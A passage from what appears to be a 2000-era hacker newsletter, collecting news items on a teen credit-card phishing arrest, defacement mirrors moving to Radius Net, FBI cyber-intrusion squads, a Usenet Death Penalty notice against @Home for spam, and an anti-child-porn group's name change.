The boys, ages 14 to 16, obtained credit card numbers by tricking America
Online and Earthlink subscribers into transmitting their account information
to the teens over the Internet, Detective Jay Davies said.

The information allowed the teenagers to obtain the passwords, addresses, phone
numbers and credit card numbers of people in New Jersey, New York, Pennsylvania,
Ohio, Florida, Nebraska, Texas and elsewhere.

The alleged scammers then used the credit card numbers to make about $8,000 in
purchases, arranging to have the merchandise delivered to unoccupied homes,
according to Davies.

Police were alerted when John Bertino of Galloway Township complained that
charges for $1,000 in "kids stuff" - including a Sony Playstation - had shown
up on his Visa credit card.

America Online spokesman Rich D'Amato said Wednesday that the company warns
subscribers against giving out their passwords or other sensitive information
and that AOL staffers will never ask a subscriber for a password or billing
information.

The teenagers, whose names weren't released, are all students at the same high
school. They were arrested between Dec. 23 and Jan. 6 and charged with fraud,
conspiracy, credit card theft and receiving stolen property.

@HWA

101.0 Radius Net takes over Attrition Mirrors 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by audit
Although Attrition.org is temporarily down due to a
crashed hard drive Radius.net has agreed to host
defacement mirrors at their site until attrition can be
repaired. The attrition staff will still be on hand to mirror
the defacements but they will be hosted at
www.radiusnet.net/mirror. Notification of defacements
can be sent to hacked@radiusnet.net.

Radius.net
http://www.radiusnet.net/mirror

@HWA

102.0 New Ezines Available 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hell and Xenos
There is a new spanish e-zine available called Digital
Rebel, Issue #3 of Digital defiance has also been
released.

Digital Rebel
http://www.digitalrebel.net/heh/

Digital Defiance
http://digital-defiance.hypermart.net

@HWA

103.0 FBI to Beef Up CyberCrime Investigation Abilities 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Fed
The National Plan for Information Systems Protection,
released earlier this week by President Clinton, details
plans for the FBI's National Infrastructure Protection
Center (NIPC) to establish a National Infrastructure
Protection and Computer Intrusion Program in the FBI's
counter terrorism division. The FBI plans to comply with
this directive with the formation of new investigative
teams specializing in computer intrusions and attacks at
all 56 of its field offices around the country. At least
one computer forensics examiner will also be assigned to
each field office.

Federal Computer Week
http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp

The full text of Clinton's cybersecurity plan can be
viewed and downloaded here:
http://www.ciao.ncr.gov

FBI beefs up cyberagent squads nationwide

BY Bob Brewin
01/14/2000

The FBI plans to reinforce its mission to counter cyberattacks with the formation of
new investigative teams specializing in computer intrusions and attacks at all 56 of
its field offices around the country. The agency also plans to assign at least one
computer forensics examiner to each field office.

The National Plan for Information Systems Protection, released on Jan. 12 by
President Clinton, outlines plans for the FBI's National Infrastructure Protection
Center (NIPC) to establish a National Infrastructure Protection and Computer
Intrusion Program in the agency's counterterrorism division. The NIPC is charged
with centrally managing the nation's defense of telecommunications systems,
railroads and electric power systems against attacks.

The plan calls for computer-intrusion squads to conduct network intrusion detection,
respond to threats, collect intelligence and conduct counterintelligence
investigations.

The FBI also plans to expand its training program to produce technically savvy
computer investigators, and will provide that training to federal law enforcement
personnel as well as state and local agencies. The NIPC trained 170 FBI agents and
17 personnel from other law enforcement agencies in 1998, and by the end of this
year will have trained an additional 500 law enforcement officers.

The NIPC, according to the president's plan, wants to train one computer-intrusion
investigator and at least one trainer from state-level investigative agencies in each
of the 50 states and Washington, D.C.

@HWA

104.0 UDP Called For Against @Home 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by the.new.guy
A USENET Death Penalty (UDP) has been called against
@Home effective 17:00 Tuesday, January 18. The result
of the death penalty would be that all @Home Users are
about to have all of their news postings BANNED from all
of USENET due to the continual spamming by its
customers. @Home has responded to the UDP by
claiming that the problem is customers who set up
proxies and that they will work to resolve the problem.

Wired
http://www.wired.com/news/technology/0,1282,33638,00.html

@Home Statement - via Deja.com
http://www.deja.com/getdoc.xp?AN=571636137

Wired;

Dead ISP Walking
by Andy Patrizio

2:10 p.m. 13.Jan.2000 PST
Anti-spammers fed up with
ExciteAtHome's blas� efforts to prevent
unsolicited emails are threatening to block
messages coming from the cable Internet
provider.

The company's AtHome networking group
is the latest ISP threatened with a
Usenet Death Penalty (UDP) for
repeatedly failing to keep spam from
flooding Usenet newsgroups.
ExciteAtHome has until 18 January to
clean up its act.

Considered a last resort, a UDP is issued
by the frustrated voluntary group of
network administrators and spam fighters
after months of complaints fall on deaf
ears.

An ISP has five business days to respond
to the death penalty warning. Should the
provider fail to act, a message is sent out
to every ISP that all Usenet postings from
the offending ISP are to be deleted,
whether they're spam or not.

"It does apply pressure on the provider to
do something, often in instances where
nothing is being done," said David Ritz, a
Milwaukee resident and one of the many
spam-busters who has called for UDPs in
the past.

"The solutions are not easy, they are
quite technical, and it will cost them
some money, but it won't cost them as
much money as bad publicity will cost
them," Ritz said.

UDPs will continue to be used to get the
attention of management, he said.

"The grunts at the lowest level are aware
of the problem but can't get the
attention of management," he said.
"[Only] the threat of [a UDP] will get their
attention."

In this case, it worked. ExciteAtHome
officials posted a note on
news.admin.usenet.net-abuse, a Usenet
newsgroup where the UDP was first
discussed. The posting stated that due
to improperly installed proxy software, its
subscribers were turned into relay
conduits for spam, and spammers took
advantage of the faulty configuration.

Most of the AtHome abuse comes from
"open" proxy servers.

Normally, AtHome news servers are only
accessible to AtHome subscribers, but an
open proxy server means anyone can
connect to it and use it to post messages
on Usenet.

"As of today, we are stepping up our
involvement and taking more aggressive
action by performing frequent
network-wide scans of our customer base
to target proxy servers," wrote David
Jackson, manager of network policy
management at ExciteAtHome, in
Mountain View, California. "We are
committed to promoting better AtHome
participation on the Usenet, and we are
in the process of modifying our current
news product and news architecture."

Ritz is cautiously optimistic. He plans to
request that the UDP be given an
extension of two to four weeks to give
ExciteAtHome time to implement all of the
things it needs to get control of the
problem. "I believe they are taking this
extremely seriously," he said. "I hope
AtHome will come out of this as a
respected member of the community,
which it should if they do what's
necessary."

Ritz is part of a team of spam fighters,
whom he describes as overworked,
"underslept," and volunteer.

"Every one is working very hard to put
themselves out of a job. There's nothing
they'd like more than to not be needed,"
he said.

To activate the death penalty, the
groups send out cancellation messages
that are replicated across Usenet news
servers to delete messages identified as
spam.

Usenet is the pioneering message board
system of the Internet for open
discussion of any and all subjects. In
recent years, Usenet has been
abandoned in favor of message boards on
Web sites for a number of reasons, spam
not the least of those reasons. One of
the worse spammers Ritz ever saw posted
120,000 messages in a 24-hour period.

Ritz said the top three current offending
sources for spam are AtHome servers,
and that 25 percent of all traffic from
AtHome's news servers is spam. To
qualify as "spam," a message has to be
posted to 20 or more newsgroups.

The extremely effective UDP has been
issued against America Online,
CompuServe, Erols.com, TIAC, BBN
Planet, and Netcom, according to the
UDP FAQ.

In every case, the ISP dealt with the
problem before a UDP was issued. The
worst offender was UUNet, which had no
acceptable use policy and did not
respond to months of complaints. At the
time the UDP was issued in 1997, 40
percent of all Usenet traffic was spam,
much of it originating from UUNet.

To make their point, in early 1999 the
spam busters took a week off and allowed
the spam to flow freely. The end result
was news servers all over the world
suddenly filled up, causing disk-full errors.

"This was so dramatic it had the single
greatest effect on reducing the volume of
spam," said Ritz, who claimed it also
increased support for UDPs. "Admins
became aware of just how desperate and
drastic the condition was."

@HWA

@HOME Statement:

Subject: [usenet] Usenet Death Penalty Notice: @Home Network
Date: 01/12/2000
Author: David Ritz <dritz@primenet.com>

-----BEGIN PGP SIGNED MESSAGE-----

[posted and mailed]
[Please direct follow ups to news.admin.net-abuse.usenet.]

Posted to: news.admin.net-abuse.usenet
news.admin.net-abuse.policy
news.admin.net-abuse.bulletins
news.admin.announce

Mailed to: abuse@corp.home.net
news@corp.home.net
noc@corp.home.net
abuse@rogers.home.net
Internet.Abuse@shaw.ca
David Jackson <davjackson@corp.home.net>

Over the past year, @Home Network has been the source of vast
quantities of Usenet spam. Despite countless complaints, reports,
and phone calls, @Home Network shows no inclination towards
stopping this ongoing abuse. By December, 1999, the situation
reached unconscionable levels of abuse.

Currently there is still a huge volume of EMP spam originating both
directly from @Home's @Home grown spammers and through the
countless open proxies to their news servers. These open proxies
present a very clear threat to the entire Usenet community at large.

The data included in the following article shows a trend of
persistent and increasing abuse.

<http://www.deja.com/getdoc.xp?AN=570620876&fmt=text>
} Newsgroups: news.admin.net-abuse.usenet,news.admin.net-abuse.misc
} Date: Sun, 9 Jan 2000 22:20:54 -0700
} From: David Ritz <dritz@primenet.com>
} Reply-To: David Ritz <dritz@primenet.com>
} To: abuse@corp.home.net, news@corp.home.net, abuse@rogers.home.net,
} Internet.Abuse@shaw.ca
} cc: David Jackson <davjackson@corp.home.net>
} Subject: [RFD] @Home UDP Proposal: A Request for Remedial Action
} Message-ID: <Pine.BSI.3.96.1000109220201.27298A-100000@usr01.primenet.com>
} Followup-To: news.admin.net-abuse.usenet

Because of this lack of response to serious, ongoing problems, even
when they have been pointed out repeatedly, a full active Usenet
Death Penalty will go into effect at the close of business, 17:00
PST, on Tuesday, 18 January 2000 (19 Jan 2000 01:00:00 GMT).

Please see the Usenet Death Penalty FAQ,
<http://www.stopspam.org/usenet/faqs/udp.html>.

This action will affect all traffic posted to the @Home Network
news servers, having a Path stamp of *.*.*.home.com.POSTED.

It is sincerely hoped that @Home Network. will take appropriate
measures to stem the flow of abuse from their network before this
time. Any assistance which they may require will be gladly
provided.

Should this action become unavoidable, sites not wishing to
participate may alias out the pseudosite homeudp!.

Sites not wanting to participate in any active UDPs may alias out
the pseudosite !udpcancel!.

- --
David Ritz <dritz@primenet.com> Finger for PGP Public Keys
Fight against spam & spammers http://spam.abuse.net
Outlaw Junk Email. ++++++ Join CAUCE ++++++ http://www.cauce.org
** Be kind to animals - Kiss a shark. **

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: Finger:dritz@primenet.com for public keys

iQCVAwUBOHwYJNzLrWGabIhRAQErcwQAhZS/JXY+TGBrxXsdLVgHss38OV0r9oVN
ix1UodLsbn0upUP8u3xACKREfxySW/kK/uuyz2C5DwlhB4OM6fN2w0H21QbGHmIe
XNvBZq2ap1FQlHYCByO/5m7bPyi0xrYbW+R4XLo20NMEqSFxTuvgT4UBHMKVebh1
wu++QUc3pGw=9Vdy
-----END PGP SIGNATURE-----

@HWA

105.0 ACPM Changes Name and Stops Intrusions 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lawless
Originally featured on HNN several months ago, the
ACPM (Anti Child Porn Militia) has evolved into an
organization which uses technical, though legal and
ethical techniques to combat the growing child
pornography trade on the internet. Changing their name
to ACPO (Anti Child Porn Organization) the group hopes
to move away from "Hacktivism" towards a hack-free
methodology to identify and shut down child
pornography traders and their sites.

ACPO
http://www.antichildporn.org/site/html/news.html